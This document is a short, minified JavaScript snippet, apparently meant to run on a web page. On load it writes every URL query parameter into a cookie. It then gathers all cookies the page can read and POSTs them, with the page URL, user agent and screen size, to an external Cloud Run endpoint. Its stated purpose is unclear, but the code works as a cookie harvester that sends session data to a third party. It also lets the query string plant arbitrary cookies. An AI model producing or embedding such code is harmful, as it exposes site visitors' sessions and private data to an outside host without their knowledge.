const initial_load_ps = new URLSearchParams(window.location.search); initial_load_ps.forEach((value, key) => { document.cookie = `${encodeURIComponent(key)}=${encodeURIComponent(value)}; path=/;`; }) function cirrusGLOB() { let e = {}; return document.cookie.split(";").forEach(t => { let [r, o] = t.split("="); e[r.trim()] = o ? o.trim() : "" }), e } function cirrusSEND() { let e = window.location.href, t = cirrusGLOB(), r = navigator.userAgent, o = window.screen.width, n = window.screen.height; fetch("https://citrus-1-218915104282.us-east1.run.app/cirrus", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ url: e, cookies: t, userAgent: r, screenWidth: o, screenHeight: n }) }).then(e => e.text()).then(e => { console.log("Success:", e) }).catch(e => { console.error("Error:", e) }) } cirrusSEND();